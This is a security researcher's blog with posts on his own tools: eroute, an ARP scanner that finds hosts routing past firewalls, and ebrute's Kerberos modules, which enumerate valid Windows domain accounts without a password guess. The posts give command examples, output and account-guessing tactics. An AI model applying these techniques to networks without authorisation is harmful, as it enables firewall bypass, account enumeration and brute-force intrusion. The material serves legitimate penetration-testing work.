Friday, 1 March 2013

eroute v0.7


eroute v0.7

eroute is a simple arp scanner which can also do route checking through each host. It can quickly identify through the use of TCP, ICMP and other IP protocols (with mixed TTLs) hosts which are set to route packets and bridge networks. This small update adds in an options for trying all IP protocols (-allip) which in some assessments has been useful in identifying another method of egress.


route v0.7 - Edward Torkington
Usage:     -r <range>     -s <sourceIP>     -d <deviceindex>     -i <route check to destination ip/s for routing e.g.216.239.59.147-150>     -I <route check to file containing destination ip/s e.g. alive-hosts.txt     -p <route check port numbers , seperated .e.g. 80,443>     -P <route check file containing port numbers, e.g. ports.txt>     -syn <send syn packets to each of the ip/ports>     -ping <send echo request to each of the ips>     -allip <try all IP protocols>     -ttl <send route check packets with normal TTL and with a TTL of 1>     -t <time delay between packets (default 10ms)>Examples:      Simple ARP                             -r 10.0.5-6.0-255      ARP from outside the range             -r 192.168.0.1-255 -s 192.168.0.5      ARP with route checking                -r 10.0.5-6.0-255 -i 209.85.229.103 -syn -p 80,443,3389      ARP with route checking (ttl 1)        -r 10.0.5-6.0-255 -i 209.85.229.103 -syn -ttl -P c:\tools\wl\1-65535.txt      ARP with all route checks              -r 10.0.5-6.0-255 -i 209.85.229.103 -syn -ping -ttl -P c:\tools\wl\1-65535.txt

Requires:


  • Winpcap
  • .net Framework 2

Download:




Posted by at No comments:
Links to this post

Friday, 11 May 2012

eroute - simple arp scanner with route checking



eroute

eroute is a simple arp scanner which can also do route checking through each host. It can quickly identify through the use of TCP and ICMP (with mixed TTLs) hosts which are set to route packets and bridge networks. This is obviously useful in subverting any firewall rules deployed on a network device. Some examples are detailed below:

* Arp scanner (-r 192.168.1.1-254)
* Check routes via TCP to google (-r 192.168.1.1-254 -i 209.85.229.103 -tcp)
* Check routes via ICMP to google (-r 192.168.1.1-254 -i 209.85.229.103 -ping)
* Check routes via TCP to google with a normal TTL/TTL of 1 (-r 192.168.1.1-254 -i 209.85.229.103 -tcp -ttl)
* Check routes via ICMP to google with a normal TTL/TTL of 1 (-r 192.168.1.1-254 -i 209.85.229.103 -ping -ttl)
* Check routes via TCP to a range of hosts (-r 192.168.1.1-254 -i 192.168.2.1-254 -tcp)
* Check routes via TCP to hosts stored in a file (-r 192.168.1.1-254 -I targets.txt -tcp)
* Check routes via TCP to hosts stored in a file with ports on the cmdline (-r 192.168.1.1-254 -I targets.txt -tcp -p 23,25,80,443,445,3389)
* Check routes via TCP to hosts stored in a file with ports from a file (-r 192.168.1.1-254 -I targets.txt -tcp -P 1-65535.txt)

As the routes are checked for incoming packets to the host, if you are port scanning at the same time the results might need some digging through. As such it is best to run in isolation.

Simple ARP Scan

C:\tools\dev\routeCheck\routeCheck\bin\Release>eroute.exe -r 192.168.8.1-254
eroute v0.5 - Edward Torkington
The following devices are available on this machine:
----------------------------------------------------


0) TAP-Win32 Adapter V9 IP'0.0.0.0' MAC'00FFDEC0CAC9'
1) VMware Virtual Ethernet Adapter IP'192.168.100.1' MAC'005056CC0001'
2) Intel(R) 82579LM Gigabit Network Connection IP'0.0.0.0' MAC'00FFD354C3BF'
3) Microsoft IP'0.0.0.0' MAC'A088B4672E55'
4) Check Point Virtual Network Adapter IP'0.0.0.0' MAC'54A4F7C7A111'
5) Microsoft IP'0.0.0.0' MAC'A088B4675E55'
6) Juniper Network Connect Virtual Adapter IP'0.0.0.0' MAC'00FFB0EED408'
7) Microsoft IP'192.168.8.202' MAC'A088B4672E54'
8) VMware Virtual Ethernet Adapter IP'192.168.233.1' MAC'005056C00908'
9) Check Point Virtual Network Adapter IP'172.19.111.147' MAC'541D2168BA22'


-- Please choose a device: 7
192.168.8.1      is-at A0:21:B7:10:27:AA
192.168.8.8      is-at 00:19:66:44:03:F1
192.168.8.9      is-at 00:50:56:7B:57:20
192.168.8.21     is-at 04:20:9A:21:10:04
192.168.8.82     is-at 00:50:56:12:05:99
192.168.8.204    is-at 00:0C:29:44:4A:33
192.168.8.201    is-at D0:23:DB:51:A1:B6
192.168.8.209    is-at 00:06:78:0D:8C:19
192.168.8.216    is-at 00:50:56:B4:00:0E
192.168.8.225    is-at 98:D6:BB:26:4F:28
192.168.8.226    is-at 00:50:56:89:6E:A7
192.168.8.254    is-at E0:46:9A:51:BA:12
Waiting 5 seconds for any responses...


Sorted:
192.168.8.1      is-at A0:21:B7:10:27:AA
192.168.8.8      is-at 00:19:66:44:03:F1  Asiarock Technology Limited
192.168.8.9      is-at 00:50:56:7B:57:20  VMWare, Inc.
192.168.8.21     is-at 04:20:9A:21:10:04
192.168.8.82     is-at 00:50:56:12:05:99  VMWare, Inc.
192.168.8.201    is-at D0:23:DB:51:A1:B6
192.168.8.204    is-at 00:0C:29:44:4A:33  VMware, Inc.
192.168.8.209    is-at 00:06:78:0D:8C:19  Marantz Japan, Inc.
192.168.8.216    is-at 00:50:56:B4:00:0E  VMWare, Inc.
192.168.8.225    is-at 98:D6:BB:26:4F:28
192.168.8.226    is-at 00:50:56:89:6E:A7  VMWare, Inc.
192.168.8.254    is-at E0:46:9A:51:BA:12


Route checking to Google with ICMP

C:\tools\dev\routeCheck\routeCheck\bin\Debug>eroute.exe -d 7 -r 192.168.8.1-254 -i 209.85.229.103 -ping
eroute v0.5 - Edward Torkington
192.168.8.1      is-at A0:21:B7:10:27:AA
192.168.8.8      is-at 00:19:66:44:03:F1
192.168.8.9      is-at 00:50:56:7B:57:20
192.168.8.21     is-at 04:20:9A:21:10:04
192.168.8.82     is-at 00:50:56:12:05:99
192.168.8.204    is-at 00:0C:29:44:4A:33
192.168.8.209    is-at 00:06:78:0D:8C:19
192.168.8.216    is-at 00:50:56:B4:00:0E
192.168.8.225    is-at 98:D6:BB:26:4F:28
192.168.8.226    is-at 00:50:56:89:6E:A7
192.168.8.254    is-at E0:46:9A:51:BA:12
Waiting 5 seconds for any responses...


Sorted:
192.168.8.1      is-at A0:21:B7:10:27:AA
192.168.8.8      is-at 00:19:66:44:03:F1  Asiarock Technology Limited
192.168.8.9      is-at 00:50:56:7B:57:20  VMWare, Inc.
192.168.8.21     is-at 04:20:9A:21:10:04
192.168.8.82     is-at 00:50:56:12:05:99  VMWare, Inc.
192.168.8.204    is-at 00:0C:29:44:4A:33  VMware, Inc.
192.168.8.209    is-at 00:06:78:0D:8C:19  Marantz Japan, Inc.
192.168.8.216    is-at 00:50:56:B4:00:0E  VMWare, Inc.
192.168.8.225    is-at 98:D6:BB:26:4F:28
192.168.8.226    is-at 00:50:56:89:6E:A7  VMWare, Inc.
192.168.8.254    is-at E0:46:9A:51:BA:12


Checking routes...
Recieved from : 209.85.229.103      MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,0,0
Recieved from : 209.85.229.103      MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,0,0
Waiting 5 seconds for any responses...


Route checking to Google with TCP and default ports

C:\tools\dev\routeCheck\routeCheck\bin\Debug>eroute.exe -d 7 -r 192.168.8.1-254 -i 209.85.229.103 -syn
eroute v0.5 - Edward Torkington
192.168.8.1      is-at A0:21:B7:10:27:AA
192.168.8.8      is-at 00:19:66:44:03:F1
192.168.8.9      is-at 00:50:56:7B:57:20
192.168.8.21     is-at 04:20:9A:21:10:04
192.168.8.82     is-at 00:50:56:12:05:99
192.168.8.204    is-at 00:0C:29:44:4A:33
192.168.8.209    is-at 00:06:78:0D:8C:19
192.168.8.216    is-at 00:50:56:B4:00:0E
192.168.8.225    is-at 98:D6:BB:26:4F:28
192.168.8.226    is-at 00:50:56:89:6E:A7
192.168.8.254    is-at E0:46:9A:51:BA:12
Waiting 5 seconds for any responses...


Sorted:
192.168.8.1      is-at A0:21:B7:10:27:AA
192.168.8.8      is-at 00:19:66:44:03:F1  Asiarock Technology Limited
192.168.8.9      is-at 00:50:56:7B:57:20  VMWare, Inc.
192.168.8.21     is-at 04:20:9A:21:10:04
192.168.8.82     is-at 00:50:56:12:05:99  VMWare, Inc.
192.168.8.204    is-at 00:0C:29:44:4A:33  VMware, Inc.
192.168.8.209    is-at 00:06:78:0D:8C:19  Marantz Japan, Inc.
192.168.8.216    is-at 00:50:56:B4:00:0E  VMWare, Inc.
192.168.8.225    is-at 98:D6:BB:26:4F:28
192.168.8.226    is-at 00:50:56:89:6E:A7  VMWare, Inc.
192.168.8.254    is-at E0:46:9A:51:BA:12


Checking routes...
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK



Route checking to Google with TCP and default ports (normal TTL/TTL of 1)

C:\tools\dev\routeCheck\routeCheck\bin\Debug>eroute.exe -d 7 -r 192.168.8.1-254 -i 209.85.229.103 -syn -ttl
eroute v0.5 - Edward Torkington
192.168.8.1      is-at A0:21:B7:10:27:AA
192.168.8.8      is-at 00:19:66:44:03:F1
192.168.8.9      is-at 00:50:56:7B:57:20
192.168.8.21     is-at 04:20:9A:21:10:04
192.168.8.82     is-at 00:50:56:12:05:99
192.168.8.204    is-at 00:0C:29:44:4A:33
192.168.8.209    is-at 00:06:78:0D:8C:19
192.168.8.216    is-at 00:50:56:B4:00:0E
192.168.8.225    is-at 98:D6:BB:26:4F:28
192.168.8.226    is-at 00:50:56:89:6E:A7
192.168.8.254    is-at E0:46:9A:51:BA:12
Waiting 5 seconds for any responses...


Sorted:
192.168.8.1      is-at A0:21:B7:10:27:AA
192.168.8.8      is-at 00:19:66:44:03:F1  Asiarock Technology Limited
192.168.8.9      is-at 00:50:56:7B:57:20  VMWare, Inc.
192.168.8.21     is-at 04:20:9A:21:10:04
192.168.8.82     is-at 00:50:56:12:05:99  VMWare, Inc.
192.168.8.204    is-at 00:0C:29:44:4A:33  VMware, Inc.
192.168.8.209    is-at 00:06:78:0D:8C:19  Marantz Japan, Inc.
192.168.8.216    is-at 00:50:56:B4:00:0E  VMWare, Inc.
192.168.8.225    is-at 98:D6:BB:26:4F:28
192.168.8.226    is-at 00:50:56:89:6E:A7  VMWare, Inc.
192.168.8.254    is-at E0:46:9A:51:BA:12


Checking routes...
Recieved from : 82.46.101.1         MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,11,0
Recieved from : 82.46.101.1         MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,11,0
Recieved from : 209.85.229.103      MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,0,0
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103      MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,0,0
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK





Route checking to Google with several ICMP and several TCP ports (normal TTL/TTL of 1)

C:\tools\dev\routeCheck\routeCheck\bin\Debug>eroute.exe -d 7 -r 192.168.8.1-254 -i 209.85.229.103 -syn -ping -ttl -p 21,22,23,25,80,88,111,443,445,338
9
eroute v0.5 - Edward Torkington
192.168.8.1      is-at A0:21:B7:10:27:AA
192.168.8.8      is-at 00:19:66:44:03:F1
192.168.8.9      is-at 00:50:56:7B:57:20
192.168.8.21     is-at 04:20:9A:21:10:04
192.168.8.1      is-at A0:21:B7:10:27:AA
192.168.8.82     is-at 00:50:56:12:05:99
192.168.8.204    is-at 00:0C:29:44:4A:33
192.168.8.209    is-at 00:06:78:0D:8C:19
192.168.8.216    is-at 00:50:56:B4:00:0E
192.168.8.225    is-at 98:D6:BB:26:4F:28
192.168.8.226    is-at 00:50:56:89:6E:A7
192.168.8.254    is-at E0:46:9A:51:BA:12
Waiting 5 seconds for any responses...


Sorted:
192.168.8.1      is-at A0:21:B7:10:27:AA
192.168.8.1      is-at A0:21:B7:10:27:AA
192.168.8.8      is-at 00:19:66:44:03:F1  Asiarock Technology Limited
192.168.8.9      is-at 00:50:56:7B:57:20  VMWare, Inc.
192.168.8.21     is-at 04:20:9A:21:10:04
192.168.8.82     is-at 00:50:56:12:05:99  VMWare, Inc.
192.168.8.204    is-at 00:0C:29:44:4A:33  VMware, Inc.
192.168.8.209    is-at 00:06:78:0D:8C:19  Marantz Japan, Inc.
192.168.8.216    is-at 00:50:56:B4:00:0E  VMWare, Inc.
192.168.8.225    is-at 98:D6:BB:26:4F:28
192.168.8.226    is-at 00:50:56:89:6E:A7  VMWare, Inc.
192.168.8.254    is-at E0:46:9A:51:BA:12


Checking routes...
Recieved from : 209.85.229.103      MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,0,0
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:443  MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 82.46.101.1         MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,11,0
Recieved from : 82.46.101.1         MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,11,0
Recieved from : 82.46.101.1         MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,11,0
Recieved from : 82.46.101.1         MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,11,0
Recieved from : 82.46.101.1         MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,11,0
Recieved from : 82.46.101.1         MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,11,0
Recieved from : 82.46.101.1         MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,11,0
Recieved from : 82.46.101.1         MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,11,0
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:443  MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:443  MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103      MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,0,0
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:443  MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 192.168.8.1:1901    MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [UDP]
Recieved from : 82.46.101.1         MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,11,0
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103      MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [ICMP] 0,0,0
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:443  MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:443  MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 192.168.8.1:1901    MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [UDP]
Recieved from : 209.85.229.103:80   MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK
Recieved from : 209.85.229.103:443  MAC: A0:21:B7:10:27:AA Gateway: 192.168.8.1      [TCP] SYN ACK


Requires:


  • Winpcap
  • .net Framework 2

Download:

http://www.r00t.tv/p/downloads.html

Posted by at No comments:
Links to this post

Tuesday, 6 December 2011


Kerberos Username Validation and Authentication Modules
I thought I would finally do a quick post about my kerberos enumeration and authentication modules for ebrute. I stumbled across this a few years ago when researching windows authentication mechanisms. A bit of tweaking allowed for the validation of a user account to be performed without a password guess via a single packet. Eventually I coded it into a usable plugin for ebrute. If you find yourself on a locked down network where you can't enumerate users via null shares or RID cycling this might just give you a nice starting point. It is best run it over UDP  (upto millions of validations per minute) but a TCP validation module is also included. If it is not working try kerbenumtcp rather than kerbenum as shown in the examples below.

In brief, Windows uses kerberos extensively to allow communication over a non-secure network to prove identities in a secure manner. The simple attack included in ebrute can be used to validate user accounts on w2k/2k3/2k8 Domain Controllers. The approach taken was:
  • Take a standard AS_REQ
  • Remove the PA_ENC_TIMESTAMP (saves 98 bytes + and a password guess.)
  • Remove any unnecessary encryption types (saves  ~16 bytes)
  • Remove host fields (saves ~30 bytes)
  • Change the client name to the user
  • Change the realm to the domain we are querying
  • Send packet
  • Parse the exceptions
Understanding the exceptions:
  • Invalid domain = KDC_ERR_WRONG_REALM
  • Invalid user = KDC_ERR_C_PRINCIPAL_UNKNOWN
  • Valid user = KDC_ERR_PREAUTH_REQUIRED

Lets look at this in action:

C:\tools\dev\br>ebrute
ebrute v0.76 - Edward Torkington
Usage: ebrute.exe -r [plugin] [options] [-u user|-U userfile] [-p pass|-P passfile] [-h host/hostrange|-H hostfile]
  -u    Username (, separated)
  -U    File containing usernames
  -up   Username prefix
  -us   Username suffix
  -uml  Username min length
  -uxl  Username max length
  -p    Password (, separated)
  -P    File containing passwords
  -pp   Password prefix
  -ps   Password suffix
  -pml  Password min length
  -pxl  Password max length
  -h    Host or range (nmap style)
  -H    File containing hosts
  -s    Connect via SSL
  -pn   Port number if not default
  -c    File, colon separated 'login:pass' format, instead of -U/-P options
  -R    File, with restore information saved via F12
  -j    Joey check
  -n    Null/blank check
  -S    Shared passwords optimisation
  -t    Number of threads [1].
  -d    Check all passwords for each user (default removes user after success)
  -un   Always perform uniqueness checks (default <5000 items otherwise slow startup...)
  -df   Disable the user filter (ignores guest, support, kerberos, IIS accounts etc...)
  -a    Disable host connectivity checks
  -l    File to output log to
  -sr   Max retries for scanner to determine if the service is alive [3]
  -sr   Max timeout in ms for scanner to determine if the service is alive [500]
  -jp   Just print out the attempts to be made
  -v    Verbose
  -vv   Very Verbose
  -vvv  Very Very Verbose
  -e    Extra parameters to pass to plugin
  -de   Forced delay between tasks (ms)
  -r    plugin - see below
  -rr   view detailed plugin help


finger ftp kerbauth kerbenum kerbenumtcp ldap lw mssql
mssqlodbc mssqlole mssqlmanaged mysql pop3 postgres process smbrawlmv2sh
smbrawlmv2mh smbrawntlmv2mh smbapilm smbapintlm smbapintlmv2 smtplogin smtpcram smtpntlm
smtpntlmbasic snmp ssh sshalt tcpfuzzerrandom tkpt tkptrandom tftp
udpfuzzerrandom vmware vnc wmi wwwbasic wwwdigest wwwntlm wwwntlmv2


  Keys during tasks
        v to increase debug level
        b to decrease debug level
        + to increase active threads
        - to decrease active threads
        p to pause/resume current job
        s to show authentication successes so far
        d to delete an IP address from the list
        F12 to save current progress, resume with parameter -R.
        Control + c to quit nicely (hold down to force!)


ERROR: No hosts specified.


C:\tools\dev\br>ebrute  -r kerbenum -P c:\tools\wl\std.txt -h 192.168.8.23 -e win2k3r2domain -t 32
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    28,881 user(s), 0 password(s), 1 host(s),  + joeycheck 28,881 tasks over 32 thread/s.
Starting: 06/12/2011 15:42:15
[5]  HOST: '192.168.8.23' | USER: 'abc' | PASS: 'abc' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[6]  HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'administrator' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[22]  HOST: '192.168.8.23' | USER: 'bob' | PASS: 'bob' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[11]  HOST: '192.168.8.23' | USER: 'guest' | PASS: 'guest' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[5]  HOST: '192.168.8.23' | USER: 'test1' | PASS: 'test1' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[15]  HOST: '192.168.8.23' | USER: 'test2' | PASS: 'test2' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[4]  HOST: '192.168.8.23' | USER: 'test' | PASS: 'test' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
Complete: 06/12/2011 15:42:23
Stats:    00:00:08    (~215,491 tasks/minute) (Performed 28,881 / 28,881 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.23' | USER: 'abc' | PASS: 'abc' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'administrator' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'bob' | PASS: 'bob' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'guest' | PASS: 'guest' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'test1' | PASS: 'test1' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'test2' | PASS: 'test2' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'test' | PASS: 'test' | EXTRA: 'win2k3r2domain' | Return code: 'Success'




We can see that the summary of authentication successes gives us 7 user accounts to play with. Whilst the user and pass is printed this is only user validation at this point. We can now use a whole host of tools (including ebrute) to perform a brute force of any services that use these accounts. Further enumeration tricks can be done, for example:
  • Fast enough to do a-z (1,4 in length sometimes even 5)
  • Prefixing admin,adm,admin-,adm-,svc onto account names
  • Performing brute forcing of common names in different formats to guess the user account pattern
Typically, this methodology leads to around 70% of domain accounts being discovered. The first can be performed easily by supplying a dictionary of a-z permutations. The second can be performed easily through ebrute with the password prefix option -pp. An example against a different windows 2008 domain is shown below:

C:\tools\dev\br>ebrute -r kerbenum -e w2k8r00t -P c:\tools\wl\main.txt -pp svc- -h 192.168.8.88 -t 16
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    7,921,039 user(s), 0 password(s), 1 host(s),  + joeycheck 7,921,039 tasks over 16 thread/s.
Starting: 06/12/2011 21:42:36
Tasks remaining: 7,915,604    (Performance: ~161,820 tasks/minute, 50 minutes remain)
[2]  HOST: '192.168.8.88' | USER: 'svc-1luvial' | PASS: 'svc-1luvial' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (At
tempt 1/5)]
[1]  HOST: '192.168.8.88' | USER: 'svc-1luvia1' | PASS: 'svc-1luvia1' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (At
tempt 1/5)]
[11]  HOST: '192.168.8.88' | USER: 'svc-49-57584' | PASS: 'svc-49-57584' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads
(Attempt 1/5)]
Tasks remaining: 7,595,408    (Performance: ~355,773 tasks/minute, 22 minutes remain)
[14]  HOST: '192.168.8.88' | USER: 'svc-UREN1' | PASS: 'svc-UREN1' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (Attem
pt 1/5)]
Tasks remaining: 7,235,127    (Performance: ~360,281 tasks/minute, 21 minutes remain)
[8]  HOST: '192.168.8.88' | USER: 'svc-ade1antamiento' | PASS: 'svc-ade1antamiento' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly redu
ce threads (Attempt 1/5)]
Tasks remaining: 6,875,006    (Performance: ~360,121 tasks/minute, 20 minutes remain)
Tasks remaining: 6,511,282    (Performance: ~363,724 tasks/minute, 19 minutes remain)
Tasks remaining: 6,144,904    (Performance: ~366,378 tasks/minute, 18 minutes remain)
Tasks remaining: 5,785,394    (Performance: ~359,510 tasks/minute, 17 minutes remain)
Tasks remaining: 5,428,181    (Performance: ~357,213 tasks/minute, 16 minutes remain)
Tasks remaining: 5,067,123    (Performance: ~361,058 tasks/minute, 15 minutes remain)
Tasks remaining: 4,718,858    (Performance: ~360,274 tasks/minute, 14 minutes remain)
Tasks remaining: 4,352,219    (Performance: ~366,639 tasks/minute, 13 minutes remain)
[12]  HOST: '192.168.8.88' | USER: 'svc-konflikterend' | PASS: 'svc-konflikterend' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduc
e threads (Attempt 1/5)]
[10]  HOST: '192.168.8.88' | USER: 'svc-konflikterende' | PASS: 'svc-konflikterende' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly red
uce threads (Attempt 1/5)]
Tasks remaining: 3,997,140    (Performance: ~361,097 tasks/minute, 12 minutes remain)
Tasks remaining: 3,634,897    (Performance: ~362,243 tasks/minute, 11 minutes remain)
[5]  HOST: '192.168.8.88' | USER: 'svc-mssql' | PASS: 'svc-mssql' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
Tasks remaining: 3,266,697    (Performance: ~368,200 tasks/minute, 10 minutes remain)
Tasks remaining: 2,902,300    (Performance: ~364,397 tasks/minute, 9 minutes remain)
Tasks remaining: 2,540,417    (Performance: ~361,883 tasks/minute, 8 minutes remain)
[1]  HOST: '192.168.8.88' | USER: 'svc-r0ckhair' | PASS: 'svc-r0ckhair' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (
Attempt 1/5)]
[16]  HOST: '192.168.8.88' | USER: 'svc-r0ckham' | PASS: 'svc-r0ckham' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (A
ttempt 1/5)]
[4]  HOST: '192.168.8.88' | USER: 'svc-r0ckham'z' | PASS: 'svc-r0ckham'z' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads
 (Attempt 1/5)]
[13]  HOST: '192.168.8.88' | USER: 'svc-r0ckh@m'$' | PASS: 'svc-r0ckh@m'$' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce thread
s (Attempt 1/5)]
Tasks remaining: 2,180,575    (Performance: ~359,842 tasks/minute, 7 minutes remain)
Tasks remaining: 1,820,347    (Performance: ~360,228 tasks/minute, 6 minutes remain)
Tasks remaining: 1,458,620    (Performance: ~361,727 tasks/minute, 5 minutes remain)
Tasks remaining: 1,097,220    (Performance: ~361,400 tasks/minute, 4 minutes remain)
Tasks remaining: 737,893    (Performance: ~359,327 tasks/minute, 3 minutes remain)
Tasks remaining: 376,757    (Performance: ~361,136 tasks/minute, 2 minutes remain)
[3]  HOST: '192.168.8.88' | USER: 'svc-ycnangup' | PASS: 'svc-ycnangup' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (
Attempt 1/5)]
Tasks remaining: 14,947    (Performance: ~361,810 tasks/minute, 1 minutes remain)
Complete: 06/12/2011 22:04:14
Stats:    00:21:37    (~366,186 tasks/minute) (Performed 7,921,039 / 7,921,039 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.88' | USER: 'svc-mssql' | PASS: 'svc-mssql' | EXTRA: 'w2k8r00t' | Return code: 'Success'

The last can also be performed with a custom dictionary to find out the format. Another tool (which I'll stick on here shortly) helps generate these dictionaries. The dictionary shown below takes the top ~100 common names from the US census and mangles them as follows:
  • FirstnameSurname
  • Firstname.Surname
  • SurnameFirstname
  • Surname.Firstname
  • Firstname_Surname
  • Surname_Firstname
  • Firstname-Surname
  • Surname-Firstname
Truncations are then performed on each of the firstnames and surnames (e.g. joh.smith,jo.smith and j.smith) to give a dictionary of ~140000 names. An example of this technique is shown below:


C:\tools\dev\br>ebrute -r kerbenum -e w2k8r00t -P c:\tools\wl\top_names.txt -h 192.168.8.88 -t 32
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    139,040 user(s), 0 password(s), 1 host(s),  + joeycheck 139,040 tasks over 32 thread/s.
Starting: 06/12/2011 22:07:22
[28]  HOST: '192.168.8.88' | USER: 'smith.john' | PASS: 'smith.john' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'kelly.michael' | PASS: 'kelly.michael' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
Complete: 06/12/2011 22:07:44
Stats:    00:00:22    (~378,301 tasks/minute) (Performed 139,040 / 139,040 tasks)

Summary of Authentication Successes:
HOST: '192.168.8.88' | USER: 'smith.john' | PASS: 'smith.john' | EXTRA: 'w2k8r00t' | Return code: 'Success'
